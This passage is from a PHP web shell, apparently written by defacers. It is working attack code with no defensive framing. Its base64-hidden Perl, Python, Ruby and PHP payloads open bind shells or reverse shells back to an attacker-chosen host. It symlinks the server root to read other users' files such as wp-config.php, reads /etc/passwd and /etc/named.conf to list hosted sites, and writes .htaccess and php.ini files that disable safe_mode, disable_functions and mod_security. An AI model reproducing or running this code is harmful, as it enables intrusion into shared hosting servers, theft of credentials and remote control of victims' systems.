  628. chdir('symvhosts');
  629. system('ln -s / kuda.txt');
  630. $fvckem ='T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBrdWRhLmh0bWwNCkFkZFR5cGUgdHh0IC5waHANCkFkZEhhbmRsZXIgdHh0IC5waHA=';
  631. $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($fvckem)); $Bok3p = symlink("/","kuda.txt");
  632. $rt="<a href='symvhosts/kuda.txt' target='_blank'><font color='lime'>Bypassed Successfully!</font></a>";
  633. echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br><br>$rt<br>Note: Kalo Forbidden pas ngebuka /var/www/vhosts/domain.com/ harap tambahkan httpdocs ex:/var/www/vhosts/domain.com/httpdocs/</center>";} echo "</form>";
  634. }
  635. elseif($_GET['do'] == 'sympy') {
  636. $sym_dir = mkdir('kuda_sympy', 0755);
  637. chdir('kuda_sympy');
  638. $file_sym = "sym.py";
  639. $sym_script = "Iy8qUHl0aG9uDQoNCmltcG9ydCB0aW1lDQppbXBvcnQgb3MNCmltcG9ydCBzeXMNCmltcG9ydCByZQ0KDQpvcy5zeXN0ZW0oImNvbG9yIEMiKQ0KDQpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIg0KZiA9ICJBbGwgUHJvY2Vzc2VzIERvbmUhXG5TeW1saW5rIEJ5cGFzc2VkIFN1Y2Nlc3NmdWxseSFcbiINCnByaW50ICJcbiINCnByaW50ICJ+Iio2MA0KcHJpbnQgIlN5bWxpbmsgQnlwYXNzIDIwMTQgYnkgTWluZGxlc3MgSW5qZWN0b3IgIg0KcHJpbnQgIlNwZWNpYWwgR3JlZXR6IHRvIDogUGFrIEN5YmVyIFNrdWxseiINCnByaW50ICJ+Iio2MA0KDQpvcy5tYWtlZGlycygna3VkYXN5bXB5JykNCm9zLmNoZGlyKCdrdWRhc3ltcHknKQ0KDQpzdXNyPVtdDQpzaXRleD1bXQ0Kb3Muc3lzdGVtKCJsbiAtcyAvIGt1ZGEudHh0IikNCg0KaCA9ICJPcHRpb25zIEluZGV4ZXMgRm9sbG93U3ltTGlua3NcbkRpcmVjdG9yeUluZGV4IGt1ZGEucGh0bWxcbkFkZFR5cGUgdHh0IC5waHBcbkFkZEhhbmRsZXIgdHh0IC5waHAiDQptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQ0KbS53cml0ZShoKQ0KbS5jbG9zZSgpDQpwcmludCBodGENCg0Kc2YgPSAiPGh0bWw+PHRpdGxlPlN5bWxpbmsgUHl0aG9uPC90aXRsZT48Y2VudGVyPjxmb250IGNvbG9yPXdoaXRlIHNpemU9NT5TeW1saW5rIEJ5cGFzcyAyMDE3PGJyPjxmb250IHNpemU9ND5NYWRlIEJ5IE1pbmRsZXNzIEluamVjdG9yIDxicj5SZWNvZGVkIEJ5IE1yLnhCYXJha3VkYTwvZm9udD48L2ZvbnQ+PGJyPjxmb250IGNvbG9yPXdoaXRlIHNpemU9Mz48dGFibGU+Ig0KDQpvID0gb3BlbignL2V0Yy9wYXNzd2QnLCdyJykNCm89by5yZWFkKCkNCm8gPSByZS5maW5kYWxsKCcvaG9tZS9cdysnLG8pDQoNCmZvciB4dXNyIGluIG86DQoJeHVzcj14dXNyLnJlcGxhY2UoJy9ob21lLycsJycpDQoJc3Vzci5hcHBlbmQoeHVzcikNCnByaW50ICItIiozMA0KeHNpdGUgPSBvcy5saXN0ZGlyKCIvdmFyL25hbWVkIikNCg0KZm9yIHh4c2l0ZSBpbiB4c2l0ZToNCgl4eHNpdGU9eHhzaXRlLnJlcGxhY2UoIi5kYiIsIiIpDQoJc2l0ZXguYXBwZW5kKHh4c2l0ZSkNCnByaW50IGYNCnBhdGg9b3MuZ2V0Y3dkKCkNCmlmICIvcHVibGljX2h0bWwvIiBpbiBwYXRoOg0KCXBhdGg9Ii9wdWJsaWNfaHRtbC8iDQplbHNlOg0KCXBhdGggPSAiL2h0bWwvIg0KY291bnRlcj0xDQppcHM9b3Blbigia3VkYS5waHRtbCIsInciKQ0KaXBzLndyaXRlKHNmKQ0KDQpmb3IgZnVzciBpbiBzdXNyOg0KCWZvciBmc2l0ZSBpbiBzaXRleDoNCgkJZnU9ZnVzclswOjVdDQoJCXM9ZnNpdGVbMDo1XQ0KCQlpZiBmdT09czoNCgkJCWlwcy53cml0ZSgiPGJvZHkgYmdjb2xvcj1ibGFjaz48dHI+PHRkIHN0eWxlPWZvbnQtZmFtaWx5OmNhbGlicmk7Zm9udC13ZWlnaHQ6Ym9sZDtjb2xvcjp3aGl0ZTs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6cmVkOz4lczwvdGQ+PHRkIHN0eWxlPWZvbnQtZmFtaWx5OmNhbGlicmk7Zm9udC13ZWlnaHQ6Ym9sZDs+PGEgaHJlZj1rdWRhLnR4dC9ob21lLyVzJXMgdGFyZ2V0PV9ibGFuayA+JXM8L2E+PC90ZD4iJShjb3VudGVyLGZ1c3IsZnVzcixwYXRoLGZzaXRlKSkNCgkJCWNvdW50ZXI9Y291bnRlcisx";
  640. $sym = fopen($file_sym, "w");
  641. fwrite($sym, base64_decode($sym_script));
  642. chmod($file_sym, 0755);
  643. $kuda = exe("python sym.py");
  644. echo "<center><a href='kuda_sympy/kudasympy/' target='_blank'><font color='lime'>Clik Here</a></font></center>";
  645. }
  646. elseif($_GET['bypass'] == 'disablefunc'){
  647. echo "<center><h3>Bypass Disable Functions</h3>";
  648. echo "<form method='post'><input type='submit' name='ini' value='php.ini'>&nbsp;<input type='submit' name='htce' value='.htaccess'>&nbsp;<input type='submit' name='litini' value='Litespeed'></form>";
  649. if(isset($_POST['ini']))
  650. {
  651. $file = fopen("php.ini","w");
  652. echo fwrite($file,"safe_mode = OFF\ndisable_functions = NONE");
  653. fclose($file);
  654. echo " <a href='php.ini' target='_blank'>Click Here!</a>";
  655. } if(isset($_POST['htce']))
  656. {
  657. $file = fopen(".htaccess","w");
  658. echo fwrite($file,"<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
  659. fclose($file);
  660. echo " htaccess successfully created!";
  661. } if(isset($_POST['litini'])){
  662. $iniph = "PD9waHANCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsiZmlsZSJdKTsNCmluaV9yZXN0b3JlKCJzYWZlX21vZGUiKTsNCmluaV9yZXN0b3JlKCJvcGVuX2Jhc2VkaXIiKTsNCmVjaG8gaW5pX2dldCgic2FmZV9tb2RlIik7DQplY2hvIGluaV9nZXQoIm9wZW5fYmFzZWRpciIpOw0KaW5jbHVkZSgkX0dFVFsic3MiXTsNCj8+";
  663. $byph = "c2FmZV9tb2RlID0gT0ZGXG5kaXNhYmxlX2Z1bmN0aW9ucyA9IE5PTkU=";
  664. $comp = "PElmTW9kdWxlIG1vZF9zZWN1cml0eS5jPlxuU2VjRmlsdGVyRW5naW5lIE9mZlxuU2VjRmlsdGVyU2NhblBPU1QgT2ZmXG48L0lmTW9kdWxlPg==";
  665. file_put_contents("php.ini",base64_decode($byph));
  666. file_put_contents("ini.php",base64_decode($iniph));
  667. file_put_contents(".htaccess",base64_decode($comp));
  668. echo "<script>alert('Disable Functions in Litespeed Created'); hideAll();</script>";
  669. echo"</center>";
  670. }
  671. }
  672. elseif($_GET['do'] == 'sym404') {
  673. ?>
  674. <html>
  675. <title>Symlink404</title>
  676. <script type="text/javascript" src="https://sites.google.com/site/blogrudyhartono/js/SakuraRain.js"></script>
  677. <link href="https://fonts.googleapis.com/css?family=Oregano" rel="stylesheet">
  678. <style>
  679. body{
  680. background-color: black;background-image: url("http://i66.tinypic.com/2bb8up.jpg") ;background-repeat:no-repeat ;background-size: 100% 100%;
  681. font-family: "Oregano";
  682. text-align: center;
  683. }
  684. </style>
  685. <font color="#ADFF2F">
  686. <font size=7><b><a href=https://m.facebook.com><b>Cy#b3r0ne</a></b><br>
  687. <img src=https://image.ibb.co/kdXFbx/1524360437509.png height=300px width=300px><br>
  688. <font size=5><form method="post"><br>File Target : <input name="dir" value="/home/user/public_html/wp-config.php" size="25">
  689. <br>Save As : <input name="jnck" value=""><input name="ojaykan" type="submit" value="Sikat Gan"></form><br>
  690.  
  691. Copyright By TN72 �Powered by Cy#b3r0ne<br><br>
  692. <?php
  693. @error_reporting(0);
  694. @ini_set('display_errors', 0);
  695. if($_POST['ojaykan']){
  696. rmdir("sym404");mkdir("sym404", 0777);
  697. $dir = $_POST['dir'];
  698. $jnck = $_POST['jnck'];
  699. system("ln -s ".$dir." sym404/".$jnck);
  700. symlink($dir,"sym404/".$jnck);
  701. $inija = fopen("sym404/.htaccess", "w");
  702. fwrite($inija,"ReadmeName ".$jnck);
  703. echo'<a href="sym404/">Klik Gan</a>';
  704. }
  705. }
  706. elseif($_GET['do'] == 'bctools'){
  707. echo "<center><h3>Back Connect Tools</h3>";
  708. echo "<form method='post'>
  709. <span>Bind port to /bin/sh [Perl]</font></span><br/>
  710. Port: <input type='text' name='port' value='666'> <input type='submit' name='bpl' value='>>'>
  711. <br><br>
  712. <span>Back-Connect</span><br/>
  713. Server: <input type='text' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'> Port: <input type='text' name='port' value='666'><select class='select' name='backconnect' style='width: 100px;' height='10'><option value='perl'>Perl</option><option value='php'>PHP</option><option value='python'>Python</option><option value='ruby'>Ruby</option></select> <input type=submit value='>>'>";
  714. echo "</form>";
  715. echo "</center>";
  716. if($_POST['bpl']) {
  717. $bp=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=");
  718. $brt=@fopen('bp.pl','w');
  719. fwrite($brt,$bp);
  720. $out = exe("perl bp.pl ".$_POST['port']." 1>/dev/null 2>&1 &");
  721. sleep(1);
  722. echo "<center><pre>$out\n".exe("ps aux | grep bp.pl")."</pre></center>";
  723. unlink("bp.pl");
  724. }
  725. if($_POST['backconnect'] == 'perl') {
  726. $bc=base64_decode("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7");
  727. $plbc=@fopen('bc.pl','w');
  728. fwrite($plbc,$bc);
  729. $out = exe("perl bc.pl ".$_POST['server']." ".$_POST['port']." 1>/dev/null 2>&1 &");
  730. sleep(1);
  731. echo "<center><pre>$out\n".exe("ps aux | grep bc.pl")."</pre></center>";
  732. unlink("bc.pl");
  733. }
  734. if($_POST['backconnect'] == 'python') {
  735. $becaa=base64_decode("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk=");
  736. $pbcaa=@fopen('bcpyt.py','w');
  737. fwrite($pbcaa,$becaa);
  738. $out1 = exe("python bcpyt.py ".$_POST['server']." ".$_POST['port']);
  739. sleep(1);
  740. echo "<center><pre>$out1\n".exe("ps aux | grep bcpyt.py")."</pre></center>";
  741. unlink("bcpyt.py");
  742. }
  743. if($_POST['backconnect'] == 'ruby') {
  744. $becaak=base64_decode("IyEvdXNyL2Jpbi9lbnYgcnVieQ0KIyBkZXZpbHpjMGRlLm9yZyAoYykgMjAxMg0KIw0KIyBiaW5kIGFuZCByZXZlcnNlIHNoZWxsDQojIGIzNzRrDQpyZXF1aXJlICdzb2NrZXQnDQpyZXF1aXJlICdwYXRobmFtZScNCg0KZGVmIHVzYWdlDQoJcHJpbnQgImJpbmQgOlxyXG4gIHJ1YnkgIiArIEZpbGUuYmFzZW5hbWUoX19GSUxFX18pICsgIiBbcG9ydF1cclxuIg0KCXByaW50ICJyZXZlcnNlIDpcclxuICBydWJ5ICIgKyBGaWxlLmJhc2VuYW1lKF9fRklMRV9fKSArICIgW3BvcnRdIFtob3N0XVxyXG4iDQplbmQNCg0KZGVmIHN1Y2tzDQoJc3Vja3MgPSBmYWxzZQ0KCWlmIFJVQllfUExBVEZPUk0uZG93bmNhc2UubWF0Y2goJ21zd2lufHdpbnxtaW5ndycpDQoJCXN1Y2tzID0gdHJ1ZQ0KCWVuZA0KCXJldHVybiBzdWNrcw0KZW5kDQoNCmRlZiByZWFscGF0aChzdHIpDQoJcmVhbCA9IHN0cg0KCWlmIEZpbGUuZXhpc3RzPyhzdHIpDQoJCWQgPSBQYXRobmFtZS5uZXcoc3RyKQ0KCQlyZWFsID0gZC5yZWFscGF0aC50b19zDQoJZW5kDQoJaWYgc3Vja3MNCgkJcmVhbCA9IHJlYWwuZ3N1YigvXC8vLCJcXCIpDQoJZW5kDQoJcmV0dXJuIHJlYWwNCmVuZA0KDQppZiBBUkdWLmxlbmd0aCA9PSAxDQoJaWYgQVJHVlswXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzBdKQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXNlcnZlciA9IFRDUFNlcnZlci5uZXcoIiIsIHBvcnQpDQoJcyA9IHNlcnZlci5hY2NlcHQNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fVxyXG4iDQoJYmVnaW4NCgkJaWYgbm90IHN1Y2tzDQoJCQlmID0gcy50b19pDQoJCQlleGVjIHNwcmludGYoIi9iaW4vc2ggLWkgXDxcJiVkIFw+XCYlZCAyXD5cJiVkIixmLGYsZikNCgkJZWxzZQ0KCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQl3aGlsZSBsaW5lID0gcy5nZXRzDQoJCQkJcmFpc2UgZXJyb3JCcm8gaWYgbGluZSA9fiAvXmRpZVxyPyQvDQoJCQkJaWYgbm90IGxpbmUuY2hvbXAgPT0gIiINCgkJCQkJaWYgbGluZSA9fiAvY2QgLiovaQ0KCQkJCQkJbGluZSA9IGxpbmUuZ3N1YigvY2QgL2ksICcnKS5jaG9tcA0KCQkJCQkJaWYgRmlsZS5kaXJlY3Rvcnk/KGxpbmUpDQoJCQkJCQkJbGluZSA9IHJlYWxwYXRoKGxpbmUpDQoJCQkJCQkJRGlyLmNoZGlyKGxpbmUpDQoJCQkJCQllbmQNCgkJCQkJCXMucHJpbnQgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+Ig0KCQkJCQllbHNpZiBsaW5lID1+IC9cdzouKi9pDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZS5jaG9tcCkNCgkJCQkJCQlEaXIuY2hkaXIobGluZS5jaG9tcCkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2UNCgkJCQkJCUlPLnBvcGVuKGxpbmUsInIiKXt8aW98cy5wcmludCBpby5yZWFkICsgIlxyXG4iICsgcmVhbHBhdGgoIi4iKSArICI+In0NCgkJCQkJZW5kDQoJCQkJZW5kDQoJCQllbmQNCgkJZW5kDQoJcmVzY3VlIGVycm9yQnJvDQoJCXB1dHMgIioqKiAje25hbWV9OiN7cG9ydH0gZGlzY29ubmVjdGVkIg0KCWVuc3VyZQ0KCQlzLmNsb3NlDQoJCXMgPSBuaWwNCgllbmQNCmVsc2lmIEFSR1YubGVuZ3RoID09IDINCglpZiBBUkdWWzBdID1+IC9eWzAtOV17MSw1fSQvDQoJCXBvcnQgPSBJbnRlZ2VyKEFSR1ZbMF0pDQoJCWhvc3QgPSBBUkdWWzFdDQoJZWxzaWYgQVJHVlsxXSA9fiAvXlswLTldezEsNX0kLw0KCQlwb3J0ID0gSW50ZWdlcihBUkdWWzFdKQ0KCQlob3N0ID0gQVJHVlswXQ0KCWVsc2UNCgkJdXNhZ2UNCgkJcHJpbnQgIlxyXG4qKiogZXJyb3IgOiBQbGVhc2UgaW5wdXQgYSB2YWxpZCBwb3J0XHJcbiINCgkJZXhpdA0KCWVuZA0KCXMgPSBUQ1BTb2NrZXQubmV3KCIje2hvc3R9IiwgcG9ydCkNCglwb3J0ID0gcy5wZWVyYWRkclsxXQ0KCW5hbWUgPSBzLnBlZXJhZGRyWzJdDQoJcy5wcmludCAiKioqIGNvbm5lY3RlZFxyXG4iDQoJcHV0cyAiKioqIGNvbm5lY3RlZCA6ICN7bmFtZX06I3twb3J0fSINCgliZWdpbg0KCQlpZiBub3Qgc3Vja3MNCgkJCWYgPSBzLnRvX2kNCgkJCWV4ZWMgc3ByaW50ZigiL2Jpbi9zaCAtaSBcPFwmJWQgXD5cJiVkIDJcPlwmJWQiLCBmLCBmLCBmKQ0KCQllbHNlDQoJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCXdoaWxlIGxpbmUgPSBzLmdldHMNCgkJCQlyYWlzZSBlcnJvckJybyBpZiBsaW5lID1+IC9eZGllXHI/JC8NCgkJCQlpZiBub3QgbGluZS5jaG9tcCA9PSAiIg0KCQkJCQlpZiBsaW5lID1+IC9jZCAuKi9pDQoJCQkJCQlsaW5lID0gbGluZS5nc3ViKC9jZCAvaSwgJycpLmNob21wDQoJCQkJCQlpZiBGaWxlLmRpcmVjdG9yeT8obGluZSkNCgkJCQkJCQlsaW5lID0gcmVhbHBhdGgobGluZSkNCgkJCQkJCQlEaXIuY2hkaXIobGluZSkNCgkJCQkJCWVuZA0KCQkJCQkJcy5wcmludCAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4iDQoJCQkJCWVsc2lmIGxpbmUgPX4gL1x3Oi4qL2kNCgkJCQkJCWlmIEZpbGUuZGlyZWN0b3J5PyhsaW5lLmNob21wKQ0KCQkJCQkJCURpci5jaGRpcihsaW5lLmNob21wKQ0KCQkJCQkJZW5kDQoJCQkJCQlzLnByaW50ICJcclxuIiArIHJlYWxwYXRoKCIuIikgKyAiPiINCgkJCQkJZWxzZQ0KCQkJCQkJSU8ucG9wZW4obGluZSwiciIpe3xpb3xzLnByaW50IGlvLnJlYWQgKyAiXHJcbiIgKyByZWFscGF0aCgiLiIpICsgIj4ifQ0KCQkJCQllbmQNCgkJCQllbmQNCgkJCWVuZA0KCQllbmQNCglyZXNjdWUgZXJyb3JCcm8NCgkJcHV0cyAiKioqICN7bmFtZX06I3twb3J0fSBkaXNjb25uZWN0ZWQiDQoJZW5zdXJlDQoJCXMuY2xvc2UNCgkJcyA9IG5pbA0KCWVuZA0KZWxzZQ0KCXVzYWdlDQoJZXhpdA0KZW5k");
  745. $pbcaak=@fopen('bcruby.rb','w');
  746. fwrite($pbcaak,$becaak);
  747. $out2 = exe("ruby bcruby.rb ".$_POST['server']." ".$_POST['port']);
  748. sleep(1);
  749. echo "<center><pre>$out2\n".exe("ps aux | grep bcruby.rb")."</pre></center>";
  750. unlink("bcruby.rb");
  751. }
  752. if($_POST['backconnect'] == 'php') {
  753. $ip = $_POST['server'];
  754. $port = $_POST['port'];
  755. $sockfd = fsockopen($ip , $port , $errno, $errstr );
  756. if($errno != 0){
  757. echo "<br><font color='red'>$errno: $errstr</font>";
  758. } else if (!$sockfd) {
  759. $result = "<br><p>Unexpected error has occured, connection may have failed.</p>";
  760. } else {
  761. fputs ($sockfd ,"
  762. \n{#######################################}
  763. \n..:: BackConnect PHP By Mr.xBarakuda ::..
  764. \n{#######################################}\n");
  765. $dir = shell_exec("pwd");
  766. $sysinfo = shell_exec("uname -a");
  767. $time = shell_exec("time");
  768. $len = 1337;
  769. fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n");
  770. while(!feof($sockfd)){ $cmdPrompt = 'root@mrxbarakuda:~ $';
  771. fputs ($sockfd , $cmdPrompt );
  772. $command = fgets($sockfd, $len);
  773. fputs($sockfd , "\n" . shell_exec($command) . "\n\n");
  774. }
  775. fclose($sockfd);
  776. }
  777. }
  778. ?>
  779. <?php
  780. }
  781. elseif($_GET['do'] == 'hashgen') {
  782. $submit = $_POST['enter'];
  783. if (isset($submit)) {
  784. $pass = $_POST['password']; // password
  785. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  786. $hash = md5($pass); // md5 hash #1
  787. $md4 = hash("md4", $pass);
  788. $hash_md5 = md5($salt . $pass); // md5 hash with salt #2
  789. $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
  790. $hash1 = sha1($pass); // sha1 hash #4
  791. $sha256 = hash("sha256", $text);
  792. $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
  793. $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
  794. }
  795. echo '<form action="" method="post">';
  796. echo '<center><h3>Hash Generator</h3>';
  797. echo '<table>';
  798. echo 'Masukkan teks yang ingin di encrypt: ';
  799. echo '<input class="inputz" type="text" name="password" size="40">';
  800. echo '<input class="inputzbut" type="submit" name="enter" value="Hash!">';
  801. echo '<br>';
  802. echo 'Original Password: <input class=inputz type=text size=50 value='.$pass.'><br><br>';
  803. echo 'MD5: <input class=inputz type=text size=50 value='.$hash.'><br><br>';
  804. echo 'MD4: <input class=inputz type=text size=50 value='.$md4 .'><br><br>';
  805. echo 'MD5 with Salt: <input class=inputz type=text size=50 value='.$hash_md5.'><br><br>';
  806. echo 'MD5 with Salt & Sha1: <input class=inputz type=text size=50 value='.$hash_md5_double.'><br><br>';
  807. echo 'Sha1: <input class=inputz type=text size=50 value='.$hash1 .'><br><br>';
  808. echo 'Sha256: <input class=inputz type=text size=50 value='.$sha256.'><br><br>';
  809. echo 'Sha1 with Salt: <input class=inputz type=text size=50 value='.$hash1_sha1.'><br><br>';
  810. echo 'Sha1 with Salt & MD5: <input class=inputz type=text size=50 value='.$hash1_sha1_double.'></center></table>';
  811. ?>
  812. <?php
  813. }
  814. elseif ($_GET['do'] == 'hashid'){
  815. if(isset($_POST['gethash'])){
  816. $hash = $_POST['hash'];
  817. if(strlen($hash)==32){
  818. $hashresult = "MD5 Hash";
  819. }elseif(strlen($hash)==40){
  820. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  821. }elseif(strlen($hash)==13){
  822. $hashresult = "DES(Unix) Hash";
  823. }elseif(strlen($hash)==16){
  824. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  825. }elseif(strlen($hash)==41){
  826. $GetHashChar = substr($hash, 40);
  827. if($GetHashChar == "*"){
  828. $hashresult = "MySQL5 Hash";
  829. }
  830. }elseif(strlen($hash)==64){
  831. $hashresult = "SHA-256 Hash";
  832. }elseif(strlen($hash)==96){
  833. $hashresult = "SHA-384 Hash";
  834. }elseif(strlen($hash)==128){
  835. $hashresult = "SHA-512 Hash";
  836. }elseif(strlen($hash)==34){
  837. if(strstr($hash, '$1$')){
  838. $hashresult = "MD5(Unix) Hash";
  839. }
  840. }elseif(strlen($hash)==37){
  841. if(strstr($hash, '$apr1$')){
  842. $hashresult = "MD5(APR) Hash";
  843. }
  844. }elseif(strlen($hash)==34){
  845. if(strstr($hash, '$H$')){
  846. $hashresult = "MD5(phpBB3) Hash";
  847. }
  848. }elseif(strlen($hash)==34){
  849. if(strstr($hash, '$P$')){
  850. $hashresult = "MD5(Wordpress) Hash";
  851. }
  852. }elseif(strlen($hash)==39){
  853. if(strstr($hash, '$5$')){
  854. $hashresult = "SHA-256(Unix) Hash";
  855. }
  856. }elseif(strlen($hash)==39){
  857. if(strstr($hash, '$6$')){
  858. $hashresult = "SHA-512(Unix) Hash";
  859. }
  860. }elseif(strlen($hash)==24){
  861. if(strstr($hash, '==')){
  862. $hashresult = "MD5(Base-64) Hash";
  863. }
  864. }else{
  865. $hashresult = "Hash type not found";
  866. }
  867. }else{
  868. $hashresult = "Not Hash Entered";
  869. }
  870.  
  871. ?>
  872. <center>
  873. <form action="" method=post><tr>
  874. <table class=tabnet>
  875. <th colspan=5><h3>Hash Identification</th></h3>
  876. <tr class=optionstr><b><td>Enter Hash</td></b><td>:</td> <td><input type=text name=hash size=60 class=inputz /></td><td><input type=submit class=inputzbut name=gethash value=Identify Hash /></td></tr>
  877. <tr class=optionstr><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  878. </table></tr></form><br>
  879.  
  880. Copyright By TN72 �Powered by Mr.xBarakuda
  881. </center>
  882. <?php
  883. } elseif($_GET['do'] == 'symlink') {
  884. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  885. $d0mains = @file("/etc/named.conf");
  886. ##httaces
  887. if($d0mains){
  888. @mkdir("008_sym",0777);
  889. @chdir("008_sym");
  890. @exe("ln -s / root");
  891. $file3 = 'Options Indexes FollowSymLinks
  892. DirectoryIndex 008.htm
  893. AddType text/plain .php
  894. AddHandler text/plain .php
  895. Satisfy Any';
  896. $fp3 = fopen('.htaccess','w');
  897. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  898. echo "
  899. <table align=center border=3 style='width:60%;border-color:#8B0000;'>
  900. <tr>
  901. <td align=center><font color=lime size=2>S. No.</font></td>
  902. <td align=center><font color=lime size=2>Domains</font></td>
  903. <td align=center><font color=lime size=2>Users</font></td>
  904. <td align=center><font color=lime size=2>Symlink</font></td>
  905. </tr>";
  906. $dcount = 1;
  907. foreach($d0mains as $d0main){
